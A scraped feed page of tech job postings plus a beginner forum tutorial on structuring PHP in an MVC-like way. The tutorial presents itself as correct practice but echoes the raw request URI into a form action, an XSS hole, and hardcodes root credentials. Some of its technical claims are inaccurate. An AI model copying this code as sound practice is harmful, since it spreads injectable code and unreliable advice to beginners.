understanding 3+ years of experience in one or more of: PHP, Python, Ruby, Java, C, C++, C#, JavaScript Understand virtualization and creating performant virtualized environments Ability to manage multiple projects with competing priorities in a fast-paced environment Experience with Database sharing and partitioning Experience with Linux Experience with database backup, restore and recovery models 5+ years as MySQL production DBA including experience with design, implementation, backup and recovery, monitoring, and performance tuning. Experience with 24x7 support and troubleshooting production related database issues. 2+ years of experience managing databases in virtual and cloud environments (AWS Redshift, VMware, RDS, EC2) Experience with designing and implementing high-availability database features, utilizing various replication and disaster recovery methodologies. Experience implementing database schema changes in live production environment requiring minimal downtime and zero performance impact. Experience defining and implementing database management tools across entire database platform to ensure database performance and stability is maximized across the entire organization Experience with managing the full life-cycle of database schema design and implementation, which includes script management from development through production releases. Experience with establishing and implementing database security and backup retention policies. Experience with scaling up and out (e.g. sharding based on specific keys) databases to meet the needs of increased storage and computing capacity. Experience managing non-relational database servers such as AWS DynamoDB, Redshift, Redis or other No-SQL platforms. So, if you are a Senior Database Administrator with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Database Administrator* *AZ-Scottsdale* *SM9-1466817*
          (USA-VA-Arlington) Sr. Front End Engineer- JavaScript Guru Needed!      Cache   Translate Page   Web Page Cache   
Sr. Front End Engineer- JavaScript Guru (Angular/React ) Needed! Sr. Front End Engineer- JavaScript Guru (Angular/React ) Needed! - Skills Required - Front End Development, JavaScript(ES6), Angular 2/4, ReactJS, CSS3/HTML5, RESTful APIs & Web Services, SQL programming (PostgreSQL/MySQL), Git / Github, Automation Tools (Webpack/Grunt/Gulp/NPM), TypeScript If you are a mid - senior level Software Engineer with extensive Front End focused development experience utilizing JavaScript (ES6 ), Angular.js (or React.js), CSS3, HTML5, please read on! Based in Arlington, VA, our SaaS products is one of the leading business operating systems helping independent contractors to small-business owners. We are now looking for a mid - senior level Software Engineer to apply their expertise in browser-based app development. The ideal candidate should have the ability to write clean JavaScript (Angula JS) based code, even when faced with a challenge. If this sound like you, then how does joining a growing multi-disciplinary team to develop new capabilities and workflows to solve real-world problems sound? **Top Reasons to Work with Us** 1. Industry Leading Product 2. Massive Growth 3. Great Work, Life Balance **What You Will Be Doing** - You will contribute in developing responsive single-page applications and tools for our products that support thousands of users, nationwide and globally. - Mentor junior developers, perform code reviews, ensuring adherence to design standards and secure coding practices. - Develop/Design, implement and test high quality web applications in a cloud-based environment. - Help brainstorm and plan new applications and web services. -You will take ownership of technical problems and their resolution, including pro-actively communicating with product managers, designers, and the operations team. **What You Need for this Position** Required: - 5+ years of Software or Web Application Development experience with a Front End (UI) focus - Advanced JavaScript experience - Proficient with AngularJS (any version - preferred) or ReactJS experience - Proficient with modern web technologies such as CSS3, HTML5, Bootstrap, and/or jQuery - Experience or strong knowledge of RESTful APIs and Web Services - Source Control Management experience with Git - Agile Development experience Nice to have skills, but NOT REQUIRED: - Experience with CSS preprocessors - SASS or Less - Experience with ES6 or TypeScript - Experience with Reactive programming (RxJS and Redux ) - Server Side code with Python (Django, Flask), Rails, and/or Node.js (Express.js) - Experience with Amazon Web Services (AWS) - Experience or knowledge of Web Security **What's In It for You** - A Competitive Base Salary $120-$140k, D. O. E. - Great Medical/Dental/Vision Benefits - 401k with Matching - 18 days PTO, 7 Paid Holidays, 5 Paid Sick Days - WORK FROM HOME FRIDAYS /Office Monday - Thursdays only - Fun, Casual work environment - Company events and social gatherings So, if you are a Senior Software Engineer with 5+ years of Front End Development experience with JavaScript and JS MVC frameworks, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Sr. Front End Engineer- JavaScript Guru Needed!* *VA-Arlington* *LS3-1466777*
          (USA-MN-Eden Prairie) Principal Software Engineer - Full Stack Developer      Cache   Translate Page   Web Page Cache   
Principal Software Engineer - Full Stack Developer Principal Software Engineer - Full Stack Developer - Skills Required - Full Stack Software Engineer, .Net and C#, REACT, DynamoDB, NoSQL Databases, AWS, Working on an Agile development team, XML, JSON, MySQL If you are a Principal Software Engineer - Full Stack Developer with 6-8+ years of experience, please read on! With offices in six different states and also in Australia and Dubai, we are the global leader in healthcare communications. We have a casual & collaborative work atmosphere where everyones opinions & ideas are valued. Don't wait, apply today! Interviews are going on now. --- Your application will be considered incomplete unless the screening questions are answered. Incomplete applications cannot be submitted for further review. Please answer all of the screening questions in detail in order to expedite the process. --- -- Please note that only qualified candidates will be contacted -- **What's In It for You** - Competitive salary (Depending on experience) - Full benefits - 70% paid - 3 weeks PTO - Retirement plan with company matching - Jeans & t-shirts are our daily uniform - Work for a well-established growing company - Plus a lot more... **What You Will Be Doing** This role will develop, enhance & sustain innovative solutions to improve the customer experience. The Principal Software Engineer will implement complex software in accordance with project requirements, UX design & industry best practices. The Principal Software Engineer will also review designs & participate in meaningful collaboration sessions on how to solve customer problems & participate in determining scope for new projects. The Principal Software Engineer will own components of the architecture and direct the work of other team members; scaling projects efficiently while maximizing performance & minimizing costs & ensuring quality. Duties & Responsibilities: - Lead Scrum team to develop our new native software that will be a key component of our product offering. - Provide technical guidance in software design & development activities. - May oversee development team & coordinate strategies amongst teams to ensure technologies are interconnected & product lines are working smoothly Code, test, debug, document & maintain software applications using established coding standards & methodologies. - Participate in Scrum activities, perform code reviews, contribute to a high performing, growing team. - Own component(s) of the architecture and direct the work of other team members. - Ensure new software meets quality standards through writing unit and automated tests. - Troubleshoot, debug, and resolve product issues as they arise. - Assist in designing interfaces to improve the user experience. - Support the application lifecycle (concept, design, test, release & support). - Follow established development, documentation, testing and deployment processes. - Gather requirements and suggest solutions; serve as an integrator between business needs and technology solutions. - Collaborate with product development team to plan new features. - Participate in planning and scoping meetings for future projects. - Work cross functionally to resolve complex customer problems. - Responsible for managing & maintaining project & work backlog - Able to re-prioritize tasks as the business deems appropriate. - Lead other engineers in planning, prioritizing & executing assigned tasks within deadlines - Identify, track & mitigate risks as appropriate. - Stay current with new technology trends. - Train, coach and mentor other engineers. - Other duties may be assigned. **What You Need for this Position** Required Qualifications: - Bachelor's degree from four-year college or university & 8 years experience, or Masters Degree in Computer Science and 6 years experience with a minimum of 3 years experience leading teams; or equivalent combination of education & experience. Desired Skills: - Strong experience as a Full Stack Software Engineer - Strong Experience with .NET and C# - Strong with React - Strong experience with DynamoDB or other NoSQL databases - Experience with AWS - Experience with XML and JSON - Experience with MySQL - Understanding Java is a plus - Understanding of HL7 protocol is a plus - Understanding of Docker is a plus - Experience working on an Agile development team - Experience working in a Healthcare/clinical environment - Ability to identify, own, and solve problems independently or as part of a team. So, if you are a Principal Software Engineer - Full Stack Developer with 6-8+ years of experience, please apply today! -- Please note that only qualified candidates will be contacted -- Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Principal Software Engineer - Full Stack Developer* *MN-Eden Prairie* *SN2-1466741*
          PHP and Codeigntor Changes      Cache   Translate Page   Web Page Cache   
We have an existing site where email has stopped working. Need someone with experience to quickly fix it. (Budget: ₹12500 - ₹37500 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Data Driven Safety, LLC: Software Developer Enamored of Text and Data      Cache   Translate Page   Web Page Cache   

("Huntersville, NC", "Anywhere")

Needed yesterday: A competent (read: excellent) developer who truly enjoys solving complex scripting challenges with efficiency and precision. We're looking for people who love to tinker with computers (hardware and software), who work with text terminals all the time (and prefer it!), and who work well with limited management (i.e., take initiative). People who like to track down problems hidden in haystacks and solve them with solutions that prevent that category of problems in the future.  Does this describe you?

Skills & Requirements

  • enough experience to dive in quickly and be up-to-speed quickly
  • ability to work on multiple tasks simultaneously
  • strong coding skills, of course (essential familiarity:  ruby, bash; very helpful:  mechanize, xpath, text processing; extras: perl, lua, mysql)
  • self-motivated and objective-based (we don't care about face time)
  • Debian or Ubuntu experience is very helpful; working in Linux essential

Additional Details

Work remotely from anywhere (many employees do so full-time, others on occasion), in-person routinely in Los Angeles, or on-site in Huntersville, North Carolina.

Looking for mid-level, but will consider junior and senior level as well, as long as you have been coding as a hobby for a long time (in the case of the former), and aren't stuck in your ways (in the case of the latter).

Challenging, but supportive environment with a fun team that knows how to balance life and work.

Full-time. Competitive compensation. Planning to hire immediately.

 

No recruiters please.

About Data Driven Safety

How DDS is described by our employees: "No bs, no corporate politics, no dress code, financially-secure company, flexible work schedules, objective-based approach, employees all over the world, telecommuting is as normal as on-site, love what I do (at least most days), ... what did you want me to say again?"

DDS is a small company with a close-knit employee group. We have maintained a nearly 100% client and employee retention rate. We offer competitive salary and benefit packages to smart, loyal, creative thinkers that excel at problem solving.

DDS collects public record data (e.g., arrest, crash, judicial, etc.) directly from thousands of governmental agencies. This information fuels a number of unique services that are utilized nationally by large and small corporations, a state risk pool, municipalities, educational institutions, hospital systems and insurance underwriters. Our only publicly marketed service is Envision, a comprehensive driver improvement platform. However, most of our growth during the past several years has been driven by a set of predictive underwriting, fraud prevention and claims management services that were created at the request of our customers in the automotive and health care industries.

Data Driven Safety, LLC is dedicated to improving public safety. We have been in existence since 2009 and are owned through the Graham Group, a billion-dollar investment vehicle.

Job Perks: Odd hours celebrated; anywhere in the world acceptable. If you decide to work from our Huntersville office, there's a Jimmy John's right outside. And to eat what you find there, we have a large, private, outdoor patio. Before and after, have some decent espresso (well, iperEspresso) in the kitchen.

Apply: Please include, in your first message, the phrase, "my favorite color is [color]", replacing [color] with any color (doesn't actually have to be your favorite, if that's a secret. Also, find and report the error in the previous sentence. No phone calls, thanks.


          How to write proper PHP      Cache   Translate Page   Web Page Cache   

@spaceshiptrooper wrote:

Ok, so this is getting way out of hand. PHP isn't supposed to be this hard, but apparently, it is. Probably because people really love to copy and paste from tutorial websites that are decades old. Tutorial websites ARE the worst websites to learn PHP from. For one, they don't teach you about security at all. And second, they teach you the wrong way regardless if you know it's wrong or not.

So I am going to discuss about how to write PHP properly in 2018. I'll be discussing about something called Separation of Logic. Some people call this Separation of Concern(s), but I like to call it Separation of Logic. The terms don't really matter right now so you can use them loosely if you want in this topic. Also, remember that this topic is tailored towards beginners.

Separation of Logic or Separation of Concern(s) is pretty much a method or ideology that separates each logic so that you can manage things in an easier manner. For this topic, we are going to try and "mimic" or "use" the idea of MVC. MVC stands for Model, View, Controller. MVC is a pretty standard business idea that many applications use. MVC isn't even just for PHP, you can see MVC in other languages such as C#, Python, and even in Ruby. It's not going to be an actual MVC, we are just going to use the idea of it. We are also going to write this topic in procedural because that's what beginners love to write their PHP in. Short of OO, this is pretty darn close to MVC.

So the first thing we are going to do is determine what kind of action it is. Is it a GET or is it a POST? If it's a GET, what kind of GET is it? Are we going to need the database? This is where we brainstorm and plan how we want our application to work.

Let's start with the basic of this topic. So we're pretty much going to plan things out first. Let's decide that we want to make something simple. Pretty much, a Hello World page. This is simple. So using Separation of Logic, we pretty much will separate our controller from our views.

index.php

<?php
// Create our $helloWorld variable
$helloWorld = 'Hello World!';

// Include our index_views.php file
require_once 'index_views.php';

index_views.php

<!DOCTYPE html>
<html>
<head>
<title>First Hello World Page</title>
</head>

<body>
<p><?php print($helloWorld); ?></p>
</body>
</html>

"Why and how does it work?" you may ask. It's very simple. The index.php file does not rely on the variable to actually have it working. So if say index_views.php file is missing or has a typo, all you would really be seeing is a white page. In your error logs, you'll see a file or directory does not exist error or open file stream error if you don't have permissions to that file. So in reality, the variable actually gets passed down to the index_views.php file.

We are also using require_once because in PHP, the most abused functions are include and echo. They are also the most misunderstood functions in PHP as well. There is a difference between include, require, include_once, require_once. This is why you DO NOT learn from tutorial websites. They are terrible in every aspect.

Let's discuss what the deferences is.

include

  • Includes a file.
  • If a file is missing or has a typo, continue with execution.
  • If a file does not have the right permission for the server to read, continue with execution.

require

  • Includes a file.
  • If a file is missing or has a typo, halt execution either right before or exactly at the required line.
  • If a file does not have the right permission for the server to read, halt execution either right before or exactly at the required line.

include_once

  • Does what include does, but does it once if you are including the same file more than once.

require_once

  • Does what require does, but does it once if you are including the same file more than once.

The reason why it is recommended to use require instead of include is because of what is listed for include. You may not know or care about what those listed bullets mean, but it will be your disadvantage for ignoring those bullets.

Let's make a scenario. Say for example, you have something like the below.

index.php

<?php
include 'Scenario.php';

echo $scenario;

Scenario.php

<?php
$scenario = 'What will happen to this variable?';

Ok, so it looks pretty simple correct? Now, let's say we mistyped Scenario.php and had it like Secnario.php. Notice the c and the e are switched around. Guess what you'll get now? If you installed your development environment correctly and have errors enabled, you'll get an error message saying Undefined index and a file or directory does not exist error. Undefined index errors typically refer to variables that are referenced, but never really created. They are also from referencing associative arrays like $_POST or $_GET that does not contain that index.

But you know for sure that you created the variable $scenario in Scenario.php correct? Well that's the thing. That's what include does. Again, look at the second bullet for include. It says continue with execution. This means that even if we mistyped our Scenario.php file, it will still continue executing. This means that it will try and echo out $scenario. But again, $scenario never really was created so you'll get the Undefined index error.

Now imagine having 500 variables in other files that you are using include for. Guess what you'll be seeing? 500 Undefined index errors. Now you don't know which file is missing and what is going on. You have looked through all your files and you can't find where the problem started from. This is why you don't use include. require will halt exactly at that problem. If Scenario.php doesn't exist, it will stop executing everything. This means that echo $scenario; will never happen. This also gives you a chance to figure out what is going on. Once you have fixed the typo in your require line, the problem will go away and therefore you can continue with your day. That is why we'll be using require_once in this topic.


So let's get back on track. In our first example at the very top, you'll see that we have separated our PHP from our HTML. We have very little PHP in our HTML and that's what we want. The idea of this method is to separate all the PHP heavy stuff and put it in its own file. We will consider these files as "controllers". Any files that the user will access will be our controller. So if they go to https://localhost/test.php, the file test.php will be considered as our "controller". The file index_views.php will be consider as our "views". Really though, you don't have to name them as such. Just name them appropriately.


So I have showed you the simple GET scenario where you can implement this method. Let's dig into something a little more complex. Let's say we want to use POST and in our POST logic, we want to grab data from our database. So let's try it out. So we know that we have to make sure that the request was through POST. We aren't going to be using if(isset($_POST[...])) because this is not the correct way of checking for form submission. This is a dirty hack to bypass form submission checking and form validation. if(isset($_POST[...])) will also fail in certain Internet Explorer versions. The correct way is if($_SERVER['REQUEST_METHOD'] == 'POST'). So let's get this underway.

The generic template for this method will look something like this. We basically check to make sure that it's a POST request. If it isn't do something else. The "something else" can be as simple as redirecting the user back to the original form.

<?php
if($_SERVER['REQUEST_METHOD'] == 'POST') {

} else {

}

We'll be requiring a config file as well. This is for the database information and we'll be requiring the model file. This method kind of violates the MVC pattern, but usually, you'll have a bootstrap of some sort to load in your model file.

<?php
require_once 'config.php';

if($_SERVER['REQUEST_METHOD'] == 'POST') {

} else {

}

So that's how it'll look like. Let's continue further. So in our config.php file, we'll start by creating a few constants for the database information.

<?php
session_start();

define('DB_HOST', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'root');
define('DB', 'test');

That's simple enough. All we pretty much did was start our sessions and created our constants for our database information. Don't worry, no one cares what my database usernames and passwords are. In PHP, you can create constants in 2 ways.

// First way
define('CONSTANT_NAME', 'constant value');

// Second way
const CONSTANT_NAME = 'constant value';

The second way can only be written within classes. But in newer versions of PHP, you can create them outside of classes. We won't get into what classes are because classes will be difficult to example to a beginner who still has no clue what the difference between include and require is. The next step is to create the database connection. We'll be pretty much doing it in the config.php file.

<?php
session_start();

define('DB_HOST', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'root');
define('DB', 'test');

$options = [
	PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_OBJ,
	PDO::ATTR_ERRMODE => PDO::ERRMODE_WARNING
];

$db = new PDO('mysql:host=' . DB_HOST . ';dbname=' . DB, DB_USERNAME, DB_PASSWORD, $options);

If you did it correctly, you should get a PDO Object () if you do a print_r on the $db variable. print_r is for printing arrays or objects. Again, we won't discuss what objects are either because this falls under OO which for beginners, you won't understand a single thing about them. Let's continue further. So we're just going to basically require the model file inside the config.php file like so.

<?php
session_start();

define('DB_HOST', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'root');
define('DB', 'test');

$options = [
	PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_OBJ,
	PDO::ATTR_ERRMODE => PDO::ERRMODE_WARNING
];

$db = new PDO('mysql:host=' . DB_HOST . ';dbname=' . DB, DB_USERNAME, DB_PASSWORD, $options);

require_once 'model.php';

The reason why we are using those options within our PDO connection is because we want to set the default fetch mode to fetch objects since I am an object oriented person. If you want to fetch arrays, replace PDO::FETCH_OBJ to PDO::FETCH_ASSOC. The difference between these 2 is that FETCH_OBJ will set the default fetch mode to use -> while FETCH_ASSOC sets the default fetch mode to use ['']. Then we'll set the error mode to error warning.

So now let's start writing our controller file.

<?php
require_once 'config.php';

if($_SERVER['REQUEST_METHOD'] == 'POST') {

	// Validation here
	if(!isset($_POST['grab']) OR empty($_POST['grab'])) {

		// Just set 1 to this error.
		// There's nothing really special with this variable other than creating it
		// And we'll be referencing it in a little bit.
		$_SESSION['grab_error'] = 1;

		header('Location: index.php'); // Redirect to our index file
		die(); // Die will ignore everything after

	} else {

		print_r($_POST['grab']);

	}

} else {

	require_once 'index_views.php';

	if(isset($_SESSION['grab_error'])) {
		unset($_SESSION['grab_error']);
	}

}

So you typically don't want to print to the screen in a controller, but we're going to do it for testing purposes. I also said not to use if(isset($_POST[...])) before. The only time when if(isset($_POST[...])) is acceptable and an exception is during form validation. Form validation and form submission checking are 2 different things. Form submission checking is meant to check if the form was submitted. Form validation is to validate that the field contains what you want it to contain. For instance, if you have a field for someone's first name, you obviously don't want it to have numbers do you? That's where "form validation" comes in. Using if(isset($_POST[...])) during this time is appropriate because someone might modify the HTML stuff on their side. By not checking in case these fields exist, you will end up with Undefined index errors if someone happens to modify the page on their side. So this is the only time when using if(isset($_POST[...])) is an exception.

We are also unsetting the grab_error session after the index_views.php file because we are going to make it have a kind of feel when they refresh the page, the error message is gone. It doesn't make sense to keep the error message there when the user refreshes the page and they didn't do anything else.

Now let's continue with our index_views.php file.

<!DOCTYPE html>
<html>
<head>
<title>Grab something from the database</title>
</head>

<body>
<?php
if(isset($_SESSION['grab_error'])) {
?>
<p>Please type something into the "grab" text field.</p>
<?php
}
?>

<form action="//<?php print($_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']); ?>" method="POST">
	<input type="text" name="grab" placeholder="Type something into this field."><br>
	<button type="submit">Submit</button>
</form>
</body>
</html>

So in this view file, we are pretty much checking to see if the grab_error session is set. If it is, we display a custom message to the user. We then create our form. We'll "try" to guess what the URL is. You can leave the action attribute empty, but I believe it is best to put a URL there. So when you type something into the "grab" text field, you'll get a POST array with the field grab as an index.

Ok, the next step is to remove the print_r in our controller file and start using our model file to grab data. So let's create our model file.

<?php
function grabData($db, $string) {

	$sql = 'SELECT someRandomColumn, anotherRandomColumn, whyNotAnotherOne FROM myTable WHERE someRandomColumn = :string';
	$prepare = $db->prepare($sql);
	$parameters = [
		':string' => $string
	];

	$prepare->execute($parameters);

	if($prepare->rowCount()) {

		return $prepare->fetchAll();

	} else {

		return false;

	}

}

So in our model file, we pretty much create a function called grabData. This function requires 2 arguments. The first argument is our database connection and the second argument is the string that we want to use from our text field. We are also using Prepared Statements because we are dealing with user inputs. It is always best to use Prepared Statements when dealing with queries that have WHERE, SET, and INSERT in them. These are the queries that will have user input. Stop using ->query or _query. THIS IS UNSAFE to use when dealing with user inputs.

Ok, so we have our model file created, let's implement the very last step in our controller file and we should have everything working.

<?php
require_once 'config.php';

if($_SERVER['REQUEST_METHOD'] == 'POST') {

	// Validation here
	if(!isset($_POST['grab']) OR empty($_POST['grab'])) {

		// Just set 1 to this error.
		// There's nothing really special with this variable other than creating it
		// And we'll be referencing it in a little bit.
		$_SESSION['grab_error'] = 1;

		header('Location: index.php'); // Redirect to our index file
		die(); // Die will ignore everything after

	} else {

		// Validate "grab" first.
		// Assuming you already did.
		$grab = ....;

		$returned = grabData($db, $grab);
		if($returned == false) {

			// The returned result is false.
			// Do something else like give the user a 404 error page or give them an error message.

		} else {

			require_once 'returned_result.php';

		}

	}

} else {

	require_once 'index_views.php';

	if(isset($_SESSION['grab_error'])) {
		unset($_SESSION['grab_error']);
	}

}

So as you can see, assuming you have already done your validations, all we really do that's different is we run the grabData function. Pass in $db from our config.php because the variable $db is global at this point since we required the config.php file. Then we check to see if the results returned false. If it returned false, that means that the string that the user typed doesn't exist within the database. If it did exist, it would trigger the else statement and run the require_once line.

This method is fairly close to MVC. If you take a look at CodeIgniter, you'll see something that's similar.

public function index() {

	$this->load->model('ModelName');

	$this->ModelName->grabData($db, $grab);

}

Do you see anything different from our model call and CodeIgniter's? Other than the OO style, it's pretty much the same. CodeIgniter still needs to load the model file and within the model file, you have the function grabData. It still requires the same set of arguments. Though if you are using a proper MVC application, you don't need to have the $db connection anymore because you'll most likely be able to load the $db connection from within the model file itself. So you'll only be required 1 argument for the model call.


So pretty much wrapping this topic up, we separate all 3 logics and we have a much cleaner work environment that we can manage more smoother.

  • Separate the PHP heavy stuff into the controllers.
  • Separate the HTML stuff into the views.
  • Separate the database calls into the models.

This pretty much runs like an MVC application. And in the future, if you happen to want to switch from this kind of method to using a real MVC application, you can simply transition without a problem because you'll have that mind set of how it's supposed to work already. You would just need to learn OO. You can also use PHP in your views as well. Just have a minimal or things that aren't PHP heavy like moving files or creating files, those would have to go in the controllers.

Posts: 1

Participants: 1

Read full topic


          Introduction to database joins with mariadb and mysql join examples      Cache   Translate Page   Web Page Cache   

LinuxConfig: In this tutorial we will see the different type of joins available when using MySQL or MariaDB.


          Uniface Developer - Oscar Technology - Rossendale      Cache   Translate Page   Web Page Cache   
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          Web Developer      Cache   Translate Page   Web Page Cache   
Web Developer Salary: DOE + benefits Type: Full time Location: Bodmin Our client is expanding over the next 12 months is looking to recruit more developers to join their in-house development team, located in Bodmin. We are looking for proactive, developers to come in and support the Lead Developer. Purpose of the role Play an instrumental part in the expansion of both the web services department and also the development towards public launch of a SaaS product. Responsibilities Ensure timely and accurate delivery of work packages to customers Ensure produced development work is tested and functions as required across all platforms (quality control) Take responsibility for delivered work/projects and ensure customer happiness Ensure maintenance of existing code base Ensure development practices and processes are efficient Apply knowledge and experience to ensure that we are following best practices and making things the best they can be Ensure all time spent on projects is recorded accurately Skills & Experience required A critical eye for web design and application development Excellent verbal and written communication skills Wide ranging experience of programming and development in a commercial environment An understanding of and desire to use good software engineering practices Ability to solve problems, overcome obstacles and take things to completion Strong PHP, CSS, HTML and Javascript skills with underlying programming knowledge that can be applied to any language Experience of REST APIs and good experience of MySQL Time management ability and awareness If you would be interested in applying for this position please send an up to date CV detailing your skills and experiences. All applications are confidential and will be treated with the strictest confidence.
          Drupal.org security advisory coverage applications: [D7] Views custom table      Cache   Translate Page   Web Page Cache   

View custom table module provide you functionality to integrate your custom table data to views, and access all it's column in views. This module use hook_view_data to add custom tables in views. this module provides you following functionalities.

  1. Auto integrate custom table data to views
  2. Auto map mysql data types with drual data types
  3. Extend relationship of custom table data to drupal entities

Project link

https://www.drupal.org/project/view_custom_table

Git instructions

git clone --branch 7.x-1.x git@git.drupal.org:project/view_custom_table.git


          Softwarová sklizeň (11. 7. 2018)      Cache   Translate Page   Web Page Cache   
[1 minuta čtení] Sonda do světa otevřeného softwaru. Dnes si povíme o nástroji pro tvorbu databází, vychytáme pár softwarových chyb, vyzkoušíme zajímavý internetový prohlížeč a řekneme si o aplikaci pro čtecí zařízení. Nástroj na tvorbu databází v několika jednoduchých krocích za pomoci grafického průvodce. V současné době podporuje zatím jen PostgreSQL databáze, ale v nadcházející verzi má v plánu zprovoznit podporu i pro MySQL, MariaDB a SQLite. Poskytuje sadu generátorů pro tvorbu Qt/C++ kódu a uživatelských formulářů, může být rozšířen i o další.
          Integration Architect - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Casper, WY jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Integration Architect - Silverline Jobs - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Cheyenne, WY jobs
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Fri, 30 Mar 2018 06:14:53 GMT - View all Cheyenne, WY jobs
          Expert In Zend Framework!      Cache   Translate Page   Web Page Cache   
Need some one who can debug my website 2-3 issue very quickly. Thanks (Budget: ₹600 - ₹1500 INR, Jobs: CakePHP, MySQL, PHP, Symfony PHP, Zend)
          Sr Software Developer (Mobile App - Reactive) (7491258) - emergiTEL Inc. - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Leads design, development and documentation of a complex and comprehensive product suite.... $80,000 - $100,000 a year
From EmergiTel Inc. - Wed, 20 Jun 2018 06:49:20 GMT - View all Burnaby, BC jobs
          Software Developer Analyst - Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:19 GMT - View all Burnaby, BC jobs
          Senior Software Developer Analyst Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:18 GMT - View all Burnaby, BC jobs
          Similar advertisement engine like Google Adwords and Adsense      Cache   Translate Page   Web Page Cache   
hello PLEASE BID AND QUOTE THE RIGHT PRICE ON WHICH YOU CAN OFFER THIS DO NOT QUOTE LOW AND START DISCUSSING : need a exact Similar advertisement engine like Google Adwords and Adsense further info you can search yourself ... (Budget: €750 - €1500 EUR, Jobs: HTML5, MySQL, Objective C, PHP, Website Design)
          Software Engineer      Cache   Translate Page   Web Page Cache   
Posted on: 2018-07-11

Software Engineer (Corona, CA) Determine & lead project dvlpmnt direction. Prep & organize specifications for new features & modules. Job reqs high school diploma or eqvlnt & 8 yrs progressive exp in offered job (Sftwre Eng). Must have 8 yrs exp w/: C/C++, Visual C++, Java, C#, Python, Ruby, Matlab, Windows, Unix, Linux, MFC, Win32, STL, .Net Framework, OpenCV, SQLite, MS-SQL, Oracle, MySQL, XML, JSON, OOD, OOP, Network, Security, Multi Thread, Multimedia Technology, Image Process'g, Stream'g, HTML, CSS, JavaScript, PHP, ASP.NET, Ajax, Ruby on Rail. Must have 4 yrs exp w/: Objective-C; Mac OS X, iOS, Android, Windows Phone, Core Data, Cocoa, CocoaTouch. Mail cvr ltr & CV to: Jodi Reining, ABS Finance Company, LLC, 341 Corporate Terrace, Corona, CA 92879
recblid l697o25pjxc9nkwxw3wwgcvfawixpl


          Need an Advisor for IT Firm on project basis, to work and complete the given task and advise regulary      Cache   Translate Page   Web Page Cache   
Need an Advisor for IT Firm on project basis, to work and complete the given task and advise regulary Need php,mysql,woocommerce,codecanyon,androd app, designing, etc i cant pay much, so if u can work... (Budget: ₹1500 - ₹12500 INR, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          Fix a Broken Wordpress Website      Cache   Translate Page   Web Page Cache   
Hello. I recently moved hosting companies and my wordpress website is now broken after i have moved to a new hosting provided. I can provide you the backup of the website and database. I have tried to get the website to work but all i get is an HTTP Error 500... (Budget: $30 - $250 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Need an Advisor for IT Firm on project basis, to work and complete the given task and advise regulary      Cache   Translate Page   Web Page Cache   
Need an Advisor for IT Firm on project basis, to work and complete the given task and advise regulary Need php,mysql,woocommerce,codecanyon,androd app, designing, etc i cant pay much, so if u can work... (Budget: ₹1500 - ₹12500 INR, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          Fix a Broken Wordpress Website      Cache   Translate Page   Web Page Cache   
Hello. I recently moved hosting companies and my wordpress website is now broken after i have moved to a new hosting provided. I can provide you the backup of the website and database. I have tried to get the website to work but all i get is an HTTP Error 500... (Budget: $30 - $250 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Need an Advisor for IT Firm on project basis, to work and complete the given task and advise regulary      Cache   Translate Page   Web Page Cache   
